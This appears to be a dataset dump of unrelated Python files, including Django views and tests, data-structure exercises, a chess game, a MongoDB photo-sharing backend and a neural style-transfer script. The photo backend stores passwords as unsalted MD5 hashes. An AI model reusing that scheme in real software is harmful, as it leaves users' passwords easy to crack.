text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python3
#
# This is the output that I will get from my mycalendar1.py program.
#
Day Time Subject
Monday 9:10 AM - 10:15 AM LA
10:35 AM - 11:40 AM SS
12:10 PM - 1:15 PM S
Tuesday 9:10 AM - 10:15 AM Math
10:35 AM - 11:40 AM Orchestra
12:10 PM - 1:15 PM PF
# This is what it will show.
|
class Node:
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = None
self.next = None
class LRUCache:
def __init__(self, capacity: int):
self.capacity = capacity
self.hashmap = {}
# Initialize dummy nodes
self.head = Node(0, 0)
self.tail = Node(0, 0)
# Set up the double linked list.
self.head.next = self.tail
self.tail.prev = self.head
def get(self, key: int) -> int:
if key in self.hashmap:
node = self.hashmap[key]
self._remove(node)
self._add(node)
return node.value
else:
return -1
def put(self, key: int, value: int) -> None:
if key in self.hashmap:
self._remove(self.hashmap[key])
node = Node(key, value)
self._add(node)
self.hashmap[key] = node
if len(self.hashmap) > self.capacity:
node = self.head.next
self._remove(node)
del self.hashmap[node.key]
def _remove(self, node):
p = node.prev
n = node.next
p.next = n
n.prev = p
def _add(self, node):
p = self.tail.prev
p.next = node
self.tail.prev = node
node.prev = p
node.next = self.tail
|
from django.shortcuts import render
from .forms import ContactForm
def contact(request):
human = False
if request.POST:
form = ContactForm(request.POST)
if form.is_valid():
human = True
else:
form = ContactForm()
return render(request, 'contact.html', {
'form': form,
'human': human,
})
|
from django.urls import path, include
from . import views
from rest_framework import routers
import sys
router = routers.DefaultRouter()
router.register('employer', views.EmployerView)
router.register('contacts', views.ContactsView)
urlpatterns = [
path('', include(router.urls)),
path(r'xls/', views.export_xls, name='export_xls'),
]
|
arr = [3,5,1,7,8,12,9,2,2,0]
def mergesort(arr):
n=len(arr)
if n==1:
return
mid=n//2
left = arr[:mid]
right = arr[mid:]
mergesort(left)
mergesort(right)
l=0
m=0
p=0
nl=len(left)
nr=len(right)
while l < nl and m < nr :
if left[l] <= right[m]:
arr[p]=left[l]
l += 1
else:
arr[p]=right[m]
m += 1
p += 1
while l < nl:
arr[p]=left[l]
p += 1
l += 1
while m < nr:
arr[p]=right[m]
p += 1
m += 1
mergesort(arr)
print(arr)
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.contrib import messages
class TestViews(TestCase):
def test_registration_new_user(self):
page = self.client.post('/accounts/registration/', {
'username':'test_user',
'email': 'test@test.com',
'password1':'password',
'password2':'password'
},
follow=True)
messages = list(page.context['messages'])
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), 'You have successfully registered with UPS')
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'index.html')
def test_registration_when_user_is_already_authenticated(self):
user = User.objects.create_user(username='test_user', email='test@test.com',password='password')
self.client.login(username='test_user', password='password')
page = self.client.get('/accounts/registration/', follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'index.html')
def test_get_registration_form(self):
page = self.client.get('/accounts/registration/', follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'registration.html')
def test_get_login_form(self):
page = self.client.get('/accounts/login/', follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'login.html')
def test_login_user(self):
user = User.objects.create_user(username='test_user', password='password')
page = self.client.post('/accounts/login/', {
'username':'test_user',
'password':'password',
},
follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'index.html')
def test_login_user_when_already_logged_in(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
page = self.client.get('/accounts/login/', follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'index.html')
def test_login_error(self):
user = User.objects.create_user(username='test_user', password='password')
page = self.client.post('/accounts/login/', {
'username':'test_user',
'password':'wrongpassword',
},
follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'login.html')
def test_logout_user(self):
user = User.objects.create_user(username='test_user', password='password')
login = self.client.login(username='test_user', password='password')
self.assertTrue(login)
page = self.client.get('/accounts/logout/', follow=True)
messages = list(page.context['messages'])
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), 'You have successfully been logged out')
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'index.html')
def test_user_profile(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
page = self.client.get('/accounts/profile/', follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'profile.html')
def test_edit_profile(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
page = self.client.post('account/edit_profile/', {'first_name': 'testName', 'last_name':'test lastname', 'email': 'test@test.com', 'info':'testinfo' })
|
from seat.applications.TeacherApplication import TeacherApplication
from seat.applications.CourseApplication import CourseApplication
from seat.applications.ExamApplication import ExamApplication
from django.http import JsonResponse
from api.helpers import endpoint_checks
from django.core.urlresolvers import reverse
import logging
logger = logging.getLogger('api')
teacherApplication = TeacherApplication()
courseApplication = CourseApplication()
examApplication = ExamApplication()
# POST
def create_exam_success_json_model(exam_id):
return JsonResponse({
'success' : True,
'error' : False,
'id' : str(exam_id),
'edit_url': reverse('dashboard.views.exam_edit', args=[exam_id])
})
def create_exam_failure_json_model(message):
return JsonResponse({
'success' : False,
'error' : True,
'message' : str(message)
})
def create_exam_logic(teacher_query, request):
try:
course_id = request.POST['course_id']
[new_exam, msg] = courseApplication.create_exam(teacher_query, course_id, request.POST['name'])
return create_exam_success_json_model(new_exam.id)
except Exception, error:
logger.warn("problem creating exam! :"+str(error))
return create_exam_failure_json_model('failed to create the exam, sorry. This is probably a db error.')
def create_exam(request):
return endpoint_checks.standard_teacher_endpoint(
"create_exam",
['name', 'course_id'],
'POST',
request,
create_exam_logic
)
# DELETE
def delete_exam_success_json_model():
return JsonResponse({
'success' : True,
'error' : False,
})
def delete_exam_failure_json_model(message):
return JsonResponse({
'success' : False,
'error' : True,
'message' : str(message)
})
def delete_exam_logic(teacher, request):
try:
exam_id = request.DELETE['exam_id']
examApplication.delete_exam(exam_id)
return delete_exam_success_json_model()
except Exception, error:
logger.warn("problem deleting exam! :"+str(error))
return delete_exam_failure_json_model('failed to delete the exam, sorry. This is probably a db error.')
def delete_exam(request):
return endpoint_checks.standard_teacher_endpoint(
"delete_exam",
['exam_id'],
'DELETE',
request,
delete_exam_logic
)
# PUT
def update_exam_success_json_model():
return JsonResponse({
'success' : True,
'error' : False,
})
def update_exam_failure_json_model(message):
return JsonResponse({
'success' : False,
'error' : True,
'message' : str(message)
})
def update_exam_logic(teacher, request):
try:
exam_id = request.PUT['exam_id']
exam = examApplication.get_exam_by_id(exam_id)
exam.name = request.PUT['name']
exam.save()
return update_exam_success_json_model()
except Exception, error:
logger.warn("problem updating exam! :"+str(error))
return update_exam_failure_json_model('failed to update the exam, sorry. This is probably a db error.')
def update_exam(request):
return endpoint_checks.standard_teacher_endpoint(
"update_exam",
['exam_id', 'name'],
'PUT',
request,
update_exam_logic
)
# GET
def get_exam_success_json_model(exam):
return JsonResponse({
'success' : True,
'error' : False,
'exam' : {
'name' : exam.name,
'id' : exam.id
}
})
def get_exam_failure_json_model(message):
return JsonResponse({
'success' : False,
'error' : True,
'message' : str(message)
})
def get_exam_logic(teacher, request):
try:
exam_id = request.GET['exam_id']
exam = examApplication.get_exam_by_id(exam_id)
return get_exam_success_json_model(exam)
except Exception, error:
logger.warn("problem getting exam! :"+str(error))
return get_exam_failure_json_model('failed to get the exam, sorry. This is probably a db error.')
def get_exam(request):
return endpoint_checks.standard_teacher_endpoint(
"get_exam",
['exam_id'],
'GET',
request,
get_exam_logic
)
|
#ATUL_KONAJE 5198
#CSE6331 ATUL.KONAJE@mavs.uta.edu
import pymongo
from pymongo import MongoClient
import hashlib
from bson.binary import Binary
from datetime import datetime
import base64
#Get MongoDB instance
mClient =MongoClient()
#Create/Get existing DB
mDB=mClient.Photobook_db
def enc_pwd(passwd):
return hashlib.md5(passwd).hexdigest()
def create_user(uname,passwd,Gender):
user_coll=mDB.C_userdata
password=enc_pwd(passwd)
user_exists=user_coll.find_one({"username":uname})
if(user_exists):
return "User with this name already exists"
else:
user_coll.insert_one({"username":uname,"pwd":password})
return "User account created"
def authenticate_user(uname,passwd):
user_coll= mDB.C_userdata
password = enc_pwd(passwd)
print password
for i in user_coll.find({"username":uname}):
if(i['pwd']==password):
return True
else:
return False
#http://stackoverflow.com/questions/11915770/saving-picture-to-mongodb
def insertImage(image_data,username,img_UUID,comments,img_name):
encoded_string = base64.b64encode(image_data)
try:
img_ins=mDB.C_images.insert_one({"owner":username,"image":encoded_string,"image_UUID": str(img_UUID),"time":datetime.now(),"comments":comments,"imagename":img_name})
except Exception:
print Exception
return False
if (img_ins):
return True
def retrieveUPimage(uuid,uname):
rec = mDB.C_images.find_one({"image_UUID":uuid,"owner":uname})
decode=rec["image"].decode()
img_tag = format(decode)
return img_tag
def allmyimages(uname):
records= mDB.C_images.find({"owner":uname})
return records
def allimages():
records=mDB.C_images.find()
return records
def saveComment(uname,comment,uid):
print uid
rec=mDB.C_images.find_one({"image_UUID":uid})
cur_time=str(datetime.now()).replace("-","").replace(":","").replace(".","")
rec['comments'][cur_time]={"user":uname,"user_comment":comment}
mDB.C_images.save(rec)
return True
def retrieveComments(uuid):
rec=mDB.C_images.find_one({"image_UUID":uuid})
comm={}
comm["comment"]=[]
comm["uuid"]=uuid
c_keys=rec["comments"].keys()
c_keys.sort()
for tim in c_keys:
comm["comment"].append(rec["comments"][tim])
print comm
for i in comm:
print i
return comm
def delete_image(uuid):
mDB.C_images.delete_one({"image_UUID":uuid})
return "Deleted Successfuly"
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
""""
набор Pytest тестов для тестирования restfull версии приложения geo_map
"""
import pytest
from fastapi.testclient import TestClient
from app_fast_api import app
client = TestClient(app)
def test_read_root():
response = client.get("/", headers={"X-Token": "coneofsilence"})
assert response.status_code == 200
answer = response.content.decode(response.encoding)
etalon_answer = "\"Приложение для определения типа земельного участка по его GPS координатам и изображению генплана." \
" Конфигурация для города Казань \""
assert answer == etalon_answer
def test_404_error():
response = client.get("/abracadabra", headers={"X-Token": "coneofsilence"})
assert response.status_code == 404
answer = response.content.decode(response.encoding)
etalon_answer = '{"detail":"Not Found"}'
assert answer == etalon_answer
def test_read_status():
with TestClient(app) as client:
response = client.get("/status", headers={"X-Token": "coneofsilence"})
assert response.status_code == 200
answer = response.content.decode(response.encoding)
etalon_answer = '" Model is loaded: True GPS transformer is loaded: True <br> Features transformer is loaded: True <br> Map is loaded: True"'
assert answer == etalon_answer
def test_predict():
with TestClient(app) as client:
response = client.get("/predict/[55.80330934948255,%2049.33272207144011]", headers={"X-Token": "coneofsilence"})
assert response.status_code == 200
answer = response.content.decode(response.encoding)
etalon_answer = '"[\\"PredictResultDescription(gps=\'[55.80330934948255, 49.33272207144011]\', coord=array([25250, 12114]), probability=1.0000129, description=\'Зона мест погребения\')\\"]"'
assert answer == etalon_answer
response = client.get("/predict/[55.79883508185922,%2049.105875912272566]", headers={"X-Token": "coneofsilence"})
assert response.status_code == 200
answer = response.content.decode(response.encoding)
etalon_answer = '"[\\"PredictResultDescription(gps=\'[55.79883508185922, 49.105875912272566]\', coord=array([14404, 12460]), probability=1.0000265, description=\'Специализированная зона размещения объектов торговли, образования, здравоохранения, культуры, спорта\')\\"]"'
assert answer == etalon_answer
|
from piece import *
from board import Board
from player import Player
"""
RUNS BY CYCLES
>Each cycle is when both White and Black make a move.
>Stars the game by a White Move.
>Every move, checks if the game is finished, prints board, and
prints the last move of the game.
>For each move:
>1. Ask the position of the piece to move
>2. Shows all possible move for that piece
>3. User chose one move the his or her turn is over
>4. The same with the next player
"""
class Game():
def __init__(self):
self.howToPlay = """
> This is the chess board, the black pieces are shown
at the top and the white pieces, at the bottom.
> Also, you have a legend of the pieces at the right
> To play, the player on turn will have to choose the
piece he or she wants to move by typing its cords.
> The cords are given by a letter and a number that are
both at the left and bottom of the board. Ex: G3
> Then, the possible moves for the chosen piece will be
displayed. They are shown by ( ) instead of [ ].
> You only have to choose one of the shown cord the same
way as before. Then it's the rival's turn
> Now you guys are all good to start playing!
>>> Press ENTER to go back to the main menu
"""
self.menu = """
++++++++++++++++++++++++++++++++++++
CHESS GAME
1. Start Game
2. How to Play
3. Exit
by Jem
++++++++++++++++++++++++++++++++++++
Choose an option:"""
self.board = Board() #creates the board for the game
#get players names
self.wPl = Player("w", wki) #white player
self.bPl = Player("b", bki) #black player
#--------------------------------------
#displays menu and waits for the user's choice
def displayMenu(self):
print(self.menu) #display menu options
while True:
choice = input() #ask the user his or her choice from the main menu
if choice != "" and choice.isnumeric():
choice = int(choice)
if choice == 1:
print("\n>>> GAME STARTED!\nGood luck, " + self.wPl.name + " and " + self.bPl.name + "!")
self.startGame(self.wPl, self.bPl) #starts the game
elif choice == 2:
self.printHowToPlay()
elif choice == 3:
print(">>> THANKS FOR PLAYING, COME BACK SOON!")
exit() #ends the program
else:
print("Your choice must be a number between 1 and 3")
else:
print("Your choice must be a number [1-3]")
#-------------------------------------------------
#runs while the game is not over
#parameter are the name of the players
def startGame(self, wPl, bPl):
lastTurn = "b" #to start the game with a white's turn
while True: #set turn info
if lastTurn == "b":
lastTurn = "w"
currentPl = self.wPl #current player
else:
lastTurn = "b"
currentPl = self.bPl #current player
(self.board).print(None) #prints actual state of the board
#check if game finish in tied
if self.gameIsTied() != False:
print(self.gameIsTied()) #print tie message
exit() #end the program
#if king is on check, player must protect it
if (currentPl.king).isOnCheck():
if (self.gameIsOver(currentPl) != False):
print(self.gameIsOver(currentPl)) #print end message
exit() #end program
else:
print(currentPl.teamName + " KING IS ON CHECK, PROTECT IT")
#run protect king to take him out of the check position
(currentPl.king).protect()
else:
#if king is not on check, them rus a regular turn
print(">>> " + currentPl.teamName + "'S TURN (" + currentPl.name + ")")
self.runTurn(currentPl)
#----------------------------------
#runs a turn for the current player's team
def runTurn(self, currentPl):
piece = self.getPieceToMove(currentPl.team) #get piece to move
to = self.getPositionTo(piece, currentPl.team, currentPl) #get the possito to move to
try:
print(piece.moveTo(to[0], to[1])) #move the piece and prints a state
except:
pass
#-----------------------------------
#print how to play messages
def printHowToPlay(self):
print(">>> HOW TO PLAY\nThis is how the board looks like:") #header
(self.board).print(None) #print board for example
print(self.howToPlay) #display how to play message
input() #wait to quit menu
self.displayMenu() #go back to main menu
#-------------------------------------------------
#Ask the user to insert the position of the piece to move.
#And checks that it is possible to move that piece.
def getPieceToMove(self, team):
while True:
print("\nInsert the position of the piece to move:")
piecePosition = input() #the only user interaction for this function
#make sure input is not only one character or digit
if len(piecePosition) == 0 or len(piecePosition) == 1:
print("The input should be one letter and one digit, try again")
else:
if self.isValidPos(piecePosition):
if toSys(piecePosition, False):
#the position in this variable is ok
piecePosition = toSys(piecePosition, True)
#check that there are possible moves,
#otherwive, asks again for position
if self.validateForPiece(piecePosition, team):
#set piece position [x][y]
x = piecePosition[0]
y = piecePosition[1]
#return the specific piece
piece = getPieceAtPosition(x, y)
#get all possible moves to check if there are moves indeed
allPossibleMoves = piece.getMoves()
#if piece is a king, discard check moves
if piece.__class__ == king:
allPossibleMoves = piece.discardCheckMoves(allPossibleMoves)
if len(allPossibleMoves) == 0:
print("No possible moves for " + piece.name + ", try another one")
else:
#return the piece
return piece
else:
print("Empty spot, try another one")
else:
print("Invaid position, try another one")
else:
print("Not a valid position, try another one.")
#---------------------------------------------
#Ask the user to choose one of the possible moves to the piece chose before
def getPositionTo(self, piece, team, currentPl):
#get all possible moves to check if there are moves indeed
allPossibleMoves = piece.getMoves()
#if piece is a king, discard check moves
if piece.__class__ == king:
allPossibleMoves = piece.discardCheckMoves(allPossibleMoves)
(self.board).print(allPossibleMoves) #print board with possible moves
piece.printPossibleMoves() #print the possible moves
print('\nInsert "0" if you want to choose a different piece.')
while True:
positionTo = input() #the only user interaction for this function
#make sure input is not only one character or digit
if len(positionTo) == 0 or (positionTo != "0" and len(positionTo) == 1):
print("The input should be one letter and one digit, try again")
else:
#if users wants to change piece, go back
if positionTo == "0":
(self.board).print(None)
self.runTurn(currentPl) #run again to change piece
break
if self.isValidPos(positionTo):
if toSys(positionTo, False):
positionTo = toSys(positionTo, True)
if [positionTo[0], positionTo[1]] in allPossibleMoves:
return positionTo #return item
else:
print("That move is not possible, check the list and try again")
else:
print("Invaid position, try another one")
else:
print("Not a valid position, try another one.")
#--------------------------------------------------------------
#return true is the pos const of a letter and a number
def isValidPos(self, pos):
if pos[0].isnumeric() and not pos[1].isnumeric():
return True
elif not pos[0].isnumeric() and pos[1].isnumeric():
return True
return False
#--------------------------------------------------------------
#return True if the choosen piece to move is able to move
#takes in consideration if there is a piece is that pos and
#if the piece is the same team of the player in turn
def validateForPiece(self, piecePosition, team):
x = piecePosition[0]
y = piecePosition[1]
if not checkForPiece(x, y):
return False
else:
if getPieceAtPosition(x, y).team != team:
return False
return True
#-------------------------------
#returns tie message is the game is a tie, False otherwise
def gameIsTied(self):
#if only the two kings are remainig, the game is a tie
if (all_black_pieces == [bki]) and (all_white_pieces == [wki]):
tieMessage = """
+++++++++++++++++++++++++++++++++++++
GAME OVER
TIE BETWEEN BLACKS AND WHITES
Congratulations, {pl1} and {pl2}!
+++++++++++++++++++++++++++++++++++++
""".format(pl1=self.wPl.name, pl2=self.bPl.name)
return tieMessage
return False
#-----------------------------------------
#return gameover message is game is over, false otherwise
def gameIsOver(self, currentPl):
#if there are no saving moves, its a check mate and game is over
savingMoves = (currentPl.king).getSavingMoves()
if len(savingMoves) == 0:
endMessage = """
+++++++++++++++++++++++++++++++++++++
GAME OVER
{winnerTeam}'S ARE THE WINNERS
CHECK MAKE ON {teamName}'S KING
Congratulations!
+++++++++++++++++++++++++++++++++++++
""".format(winnerTeam=currentPl.opTeamName, teamName=currentPl.teamName)
return endMessage
return False |
import sys
__all__ = ['apply_all_config', 'apply_config', 'get_config', 'load_module']
def apply_all_config(config_module):
keys = dir(config_module)
for k in keys:
if k[:2] == '__' or type(getattr(config_module, k, None)) == 'function':
continue
apply_config(k, getattr(config_module, k, None))
def apply_config(key, config):
if not config:
return
md = sys.modules[__name__]
base_config = getattr(md, key, None)
if not base_config:
return
if key[:2] == '__' or type(base_config) == 'function':
raise KeyError('Config with key %s not invalid' % key)
for k, it in config.items():
base_config[k] = it
def get_config(key):
md = sys.modules[__name__]
return getattr(md, key, None)
def load_module(caller, folder, name):
path = '.'.join(caller.split('.')[:-1]) if caller else ''
path = '{0}.{1}.{2}'.format(path, folder, name)
md = __import__(path, globals(), locals(), ['object'], -1)
return md
APP = {
'pool_size': 20
}
LOG = {
'file': 'temp.log',
'level': 'INFO'
}
V1_HANDLER = {
}
V1_GATHER = {
'interval': 60,
'backwards_time': 30,
'driver': 'cadgather_driver'
}
|
from django.shortcuts import render
# Create your views here.
def home(request):
return render(request,'newsApp/index.html')
def sportsnews(request):
head_msg='Sports news'
msg1='No T20 world cup this year'
msg2='IPL postponed'
msg3='Paskitan players test positive for covid19'
my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}
return render(request,'newsApp/news.html',context=my_dict)
def moviesnews(request):
head_msg='Movies news'
msg1='SSRs death leave everyone shocked'
msg2='Theatres to remanin closed till 31st july'
msg3='Big releases on online streaming platform in july'
my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}
return render(request,'newsApp/news.html',context=my_dict)
def politicsnews(request):
head_msg='Poilitics news'
msg1='Indo-China situation remains escalated'
msg2='Modi addressed the country yestarday at 4 P.M'
msg3='Paskistan deploy army near the borders'
my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}
return render(request,'newsApp/news.html',context=my_dict)
|
# -*- coding: utf-8 -*-
import numpy as np
import tensorflow as tf
from vgg19_v26 import vgg19
import os
from PIL import Image
from PIL import ImageEnhance
import matplotlib.pyplot as plt
from tqdm import tqdm
img_H,img_W,img_C = 500, 800, 3
vgg19net = vgg19(trainable=False)
img = tf.get_variable(name='wanted', shape=(1,img_H,img_W,img_C))
beta_placeholder = tf.placeholder(shape=None, dtype=tf.float32)
lr_placeholder = tf.placeholder(shape=None, dtype=tf.float32)
vgg19net.inference(img, 1000)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def read_pretrained_weight():
for i in tqdm(range(32)):
sess.run(vgg19net.VARIABLE_list[i].assign(np.load('./weight/' + f'keras_{i}.npy')))
# only run once
print('read fixed weights from pre-trained model:')
read_pretrained_weight()
# define some help functions
def check_see():
plt.figure(figsize=(20,10))
for i in range(12):
plt.subplot(3,4,i+1)
see = sess.run(vgg19net.TENSOR_list[i])[0,:,:,32]
plt.imshow((see-see.min())/(see.max()-see.min()), cmap='gray')
plt.show()
# see network structrue
print('vgg19net.TENSOR_list:')
for i,o in enumerate(vgg19net.TENSOR_list):
print('{0:>2}'.format(i),':',o)
# for i,v in enumerate(tf.global_variables()):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# for i,v in enumerate(tf.trainable_variables()):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# for i,v in enumerate(vgg19net.VARIABLE_list):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# _ = sess.run(img.assign(load_img('content1.jpg')))
# check_see()
# _ = sess.run(img.assign(load_img('style5.jpg')))
# check_see()
def load_img(path):
'''
读取jpg/png/bmp格式图片文件,返回一个(1,H,W,3)的np.array
这三种格式像素点值域为[0,255]
'''
if path.split('.')[-1] == 'npy':
return np.load(path)
img = Image.open(path).resize((img_W,img_H))
img_np = np.zeros((1,img_H,img_W,img_C),dtype=np.float32)
img_np[0,:,:,:] = np.array(img)
# img_np = img_np/255.0*2.0
# img_np = img_np - 1.0
return img_np - 128.0
def save_img(path, value):
'''
默认网络能自己学到输入数据的值域
默认网络能学到"亮度"、"对比度"、"饱和度"...
'''
value = value[0] + 128.0
# 强制把结果线性放缩到 [-1,1],然后线性放缩到[0,255]以保存为图片
# value = 2*(value - value.min())/(value.max() - value.min()) - 1.0
# value = (value + 1.0)/2.0*255.0
value = np.clip(value,0,255).astype(np.uint8)
value = Image.fromarray((value))
value = ImageEnhance.Color(value).enhance(1.0)
value = ImageEnhance.Contrast(value).enhance(1.0)
value = ImageEnhance.Brightness(value).enhance(1.0)
value.save(path)
def loss_content_func(sess, content_tensor_list):
'''
param:adjust_parameter: is used for balance the content loss value and the style loss value
'''
adjust_parameter = 1.00
def loss_single_conv(fixed_content, tensor):
num_C = fixed_content.shape[3]
num_HW = fixed_content.shape[1]*fixed_content.shape[2]
return (1/(2*num_C*num_HW))*tf.reduce_sum(tf.pow(fixed_content-tensor,2))
return sum([adjust_parameter*w*loss_single_conv(sess.run(tensor), tensor) for w, tensor in content_tensor_list])
def loss_style_func(sess, style_tensor_list):
def gram_matrix(F, num_HW, num_C):
F_ik = tf.reshape(F, (num_HW, num_C))
return tf.matmul(tf.transpose(F_ik), F_ik)
def loss_single_conv(fixed_content, tensor):
num_C = fixed_content.shape[3]
num_HW = fixed_content.shape[1]*fixed_content.shape[2]
fixed_content_gram = gram_matrix(fixed_content, num_HW, num_C)
tensor_gram = gram_matrix(tensor, num_HW, num_C)
return (1/(4*num_C*num_C*num_HW*num_HW))*tf.reduce_sum(tf.pow(fixed_content_gram-tensor_gram,2))
return sum([w*loss_single_conv(sess.run(tensor), tensor) for w, tensor in style_tensor_list])
def set_content_tensor_list(_select, _weight_list=[0.1, 0.2, 0.3, 0.2, 0.1]):
'''
虽然理论上越靠后越抽象而且感受视野也越大
如果把重点放在前面的层,会更接近content的内容
如果把重点放在后面的层,会更接近content的内容
_select = [0,1,2,3,4]
_select = [11,12,13,14,15]
'''
global content_tensor_list
content_tensor_list = [[vgg19net.TENSOR_list[i]] for i in _select]
content_tensor_list = np.hstack((np.array(_weight_list).reshape(-1,1), content_tensor_list))
print('the content_tensor_list is set as follow:')
for w, t in content_tensor_list:
print(w, t)
def set_style_tensor_list(_select, _weight_list=[0.1, 0.2, 0.3, 0.2, 0.1]):
'''
虽然理论上越靠后越抽象而且感受视野也越大
如果把重点放在前面的层,会更接近style宏观层面内容,比如色块分布
如果把重点放在后面的层,会更接近style宏观层面内容,比如纹理分布
_select = [0,1,2,3,4]
_select = [11,12,13,14,15]
'''
global style_tensor_list
style_tensor_list = [[vgg19net.TENSOR_list[i]] for i in _select]
style_tensor_list = np.hstack((np.array(_weight_list).reshape(-1,1), style_tensor_list))
print('the style_tensor_list is set as follow:')
for w, t in style_tensor_list:
print(w, t)
def set_content_style_loss(content_img, style_img, dir_label):
global loss_content, loss_style, loss
global optimizer_step, savedir
# content_img, style_img = content, style
_ = sess.run(img.assign(load_img(content_img)))
loss_content = loss_content_func(sess, content_tensor_list)
_ = sess.run(img.assign(load_img(style_img)))
loss_style = loss_style_func(sess, style_tensor_list)
loss = beta_placeholder*loss_content + (1-beta_placeholder)*loss_style
optimizer = tf.train.AdamOptimizer(lr_placeholder)
optimizer_step = optimizer.minimize(loss)
sess.run(tf.variables_initializer(optimizer.variables()))
_ = content_img.split('.')[0]+'-'+style_img.split('.')[0]
savedir = './output/' + dir_label + _ + '/'
if not os.path.isdir(savedir):
os.mkdir(savedir)
print('loss_content and loss_style have been set by flie ' + content_img + ' and ' + style_img)
# total_iter_num = 0
def train_loop(img_names, beta, learning_rate, loop_num):
global total_iter_num
input_img_n, output_img_n = img_names
sess.run(img.assign(load_img(input_img_n)))
for i in range(total_iter_num, total_iter_num+loop_num):
sess.run(optimizer_step, feed_dict={beta_placeholder:beta, lr_placeholder:learning_rate})
total_iter_num = total_iter_num + 1
if i % 100 == 99 or i == 0:
output = sess.run(img)
save_img(path=savedir+output_img_n+f'_iter_{i}.jpg', value=output)
if i % 1000 == 999:
np.save(savedir+'_'+output_img_n+f'_{i}.npy', output)
loss_content_v, loss_style_v, loss_v = sess.run([loss_content, loss_style, loss], feed_dict={beta_placeholder:beta})
msg = 'i:{0:5}, loss_content:{1}, loss_style:{2}, loss:{3}'.format(i, loss_content_v, loss_style_v, loss_v)
print(msg)
with open(savedir+'_'+output_img_n+'_recording.txt','a') as flie:
flie.write(msg + '\n')
# ----- training -------------------------
def train(content_img, style_img, dir_label, beta_list=None):
global total_iter_num
set_content_style_loss(content_img, style_img, dir_label)
noise = 0.5
input_img = load_img(content_img)
input_img = (1-noise)*input_img + noise*np.random.uniform(input_img.min(),input_img.max(),size=input_img.shape)
save_img(savedir+'_input_img.jpg', input_img)
if beta_list == None:
beta_list = 0.0003, 0.0021, 0.0091, 0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961
for beta_value in beta_list:
total_iter_num = 0
output_img_n = 'beta' + str(beta_value)
print('beta:', beta_value)
img_names = (savedir+'_input_img.jpg', output_img_n)
train_loop(img_names, beta=beta_value, learning_rate=2.1, loop_num=1000*2)
img_names = (savedir+'_'+output_img_n+f'_{total_iter_num-1}.npy', output_img_n)
train_loop(img_names, beta=beta_value, learning_rate=0.8, loop_num=1000*2)
img_names = (savedir+'_'+output_img_n+f'_{total_iter_num-1}.npy', output_img_n)
train_loop(img_names, beta=beta_value, learning_rate=0.4, loop_num=1000*1)
# total_iter_num = 0
# img_names = (savedir+'_'+output_img_n+f'_{}.npy', output_img_n)
# train_loop(img_names, beta=beta_value, learning_rate=0.001, loop_num=1000*6)
print('start training:')
# 快速风格转换真的能在10s内有好的效果吗?
# https://zhuanlan.zhihu.com/p/23651687
# vgg19net.TENSOR_list:
# 0 : Tensor("conv1_0/Relu:0", shape=(1, 500, 800, 64), dtype=float32)
# 1 : Tensor("conv1_1/Relu:0", shape=(1, 500, 800, 64), dtype=float32)
# 2 : Tensor("conv2_0/Relu:0", shape=(1, 250, 400, 128), dtype=float32)
# 3 : Tensor("conv2_1/Relu:0", shape=(1, 250, 400, 128), dtype=float32)
# 4 : Tensor("conv3_0/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 5 : Tensor("conv3_1/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 6 : Tensor("conv3_2/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 7 : Tensor("conv3_3/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 8 : Tensor("conv4_0/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 9 : Tensor("conv4_1/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 10 : Tensor("conv4_2/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 11 : Tensor("conv4_3/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 12 : Tensor("conv5_0/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 13 : Tensor("conv5_1/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 14 : Tensor("conv5_2/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 15 : Tensor("conv5_3/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# set_content_tensor_list(_select=[2, 3, 4, 5, 6], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[6, 8, 9, 10, 12], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# 等待从 4000 继续训练
# train('content1.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test1--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test1--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test1--')
